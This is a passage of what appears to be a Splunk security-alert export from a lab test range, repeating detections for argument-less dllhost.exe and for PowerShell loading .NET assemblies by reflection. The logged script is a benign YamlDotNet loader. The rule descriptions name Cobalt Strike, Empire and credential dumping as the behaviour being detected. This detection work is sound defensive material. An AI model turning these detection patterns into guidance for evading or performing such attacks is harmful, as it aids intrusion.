parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664866800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664866800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6548", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664866800, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664866800", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1994", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664870132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T06:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T06:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664870132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T06:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T06:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664870132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T06:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T06:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664870132, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="# Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T06:16:29", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T06:16:29", risk_message="A suspicious powershell script contains reflective class assembly command in # Copyright 2016 Cloudbase Solutions Srl # # Licensed under the Apache License, Version 2.0 (the \"License\"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. # $here = Split-Path -Parent $MyInvocation.MyCommand.Path function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } function Initialize-Assemblies { $requiredTypes = @( \"Parser\", \"MergingParser\", \"YamlStream\", \"YamlMappingNode\", \"YamlSequenceNode\", \"YamlScalarNode\", \"ChainedEventEmitter\", \"Serializer\", \"Deserializer\", \"SerializerBuilder\", \"StaticTypeResolver\" ) $yaml = [System.AppDomain]::CurrentDomain.GetAssemblies() | ? Location -Match \"YamlDotNet.dll\" if (!$yaml) { return Load-Assembly } foreach ($i in $requiredTypes){ if ($i -notin $yaml.DefinedTypes.Name) { Throw \"YamlDotNet is loaded but missing required types ($i). Older version installed on system?\" } } } Initialize-Assemblies | Out-Null to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664863200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664863200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="6920", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664863200, search_name="ESCU - Suspicious DLLHost no Command Line Arguments - Rule", orig_time="1664863200", analyticstories="Cobalt Strike", annotations="{\"analytic_story\": [\"Cobalt Strike\"], \"confidence\": 70, \"context\": [\"Source:Endpoint\", \"Stage:Initial Access\", \"Stage:Execution\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1055\"], \"observable\": [{\"name\": \"dest\", \"role\": [\"Victim\"], \"type\": \"Endpoint\"}, {\"name\": \"User\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Cobalt Strike", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.context="Stage:Execution", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1055", count="1", dest="win-dc-mhaag-attack-range-622.attackrange.local", info_max_time="+Infinity", info_min_time="0.000", parent_process_name="unknown", process="C:\\Windows\\System32\\dllhost.exe", process_id="0x1b08", process_name="dllhost.exe", process_path="C:\\Windows\\System32\\dllhost.exe", risk_message="Suspicious dllhost.exe process with no command line arguments executed on win-dc-mhaag-attack-range-622.attackrange.local by $user$", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="49.0", savedsearch_description="The following analytic identifies DLLHost.exe with no command line arguments. It is unusual for DLLHost.exe to execute with no command line arguments present. This particular behavior is common with malicious software, including Cobalt Strike. During investigation, identify any network connections and parallel processes. Identify any suspicious module loads related to credential dumping or file writes. DLLHost.exe is natively found in C:\\Windows\\system32 and C:\\Windows\\syswow64." 1664866532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T05:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T05:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="'S-1-5-21-2251518177-1696790515-3014453336-500'", risk_object_type="user", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664866532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", Opcode="15", ScriptBlockText="function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } }", UserID="'S-1-5-21-2251518177-1696790515-3014453336-500'", analyticstories="Hermetic Wiper", analyticstories="Malicious PowerShell", annotations="{\"analytic_story\": [\"Hermetic Wiper\", \"Malicious PowerShell\"], \"confidence\": 80, \"context\": [\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-04T05:16:30", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-04T05:16:30", risk_message="A suspicious powershell script contains reflective class assembly command in function Load-Assembly { $libDir = Join-Path $here \"lib\" $assemblies = @{ \"core\" = Join-Path $libDir \"netstandard1.3\\YamlDotNet.dll\"; \"net45\" = Join-Path $libDir \"net45\\YamlDotNet.dll\"; \"net35\" = Join-Path $libDir \"net35\\YamlDotNet.dll\"; } if ($PSVersionTable.PSEdition -eq \"Core\") { return [Reflection.Assembly]::LoadFrom($assemblies[\"core\"]) } elseif ($PSVersionTable.PSVersion.Major -ge 4) { return [Reflection.Assembly]::LoadFrom($assemblies[\"net45\"]) } else { return [Reflection.Assembly]::LoadFrom($assemblies[\"net35\"]) } } to load .net code in memory with EventCode 4104 in host win-dc-mhaag-attack-range-622.attackrange.local", risk_object="win-dc-mhaag-attack-range-622.attackrange.local", risk_object_type="system", risk_score="56.0", savedsearch_description="The following analytic utilizes PowerShell Script Block Logging (EventCode=4104) to identify suspicious PowerShell execution. Script Block Logging captures the command sent to PowerShell, the full command to be executed. Upon enabling, logs will output to Windows event logs. Dependent upon volume, enable no critical endpoints or all. This analytic identifies the use of PowerShell loading .net assembly via reflection. This is commonly found in malicious PowerShell usage, including Empire and Cobalt Strike. In addition, the `load(` value may be modifed by removing `(` and it will identify more events to review. During triage, review parallel processes using an EDR product or 4688 events. It will be important to understand the timeline of events around this activity. Review the entire logged PowerShell script block." 1664866532, search_name="ESCU - PowerShell Loading DotNET into Memory via Reflection - Rule", Computer="win-dc-mhaag-attack-range-622.attackrange.local", EventCode="4104", 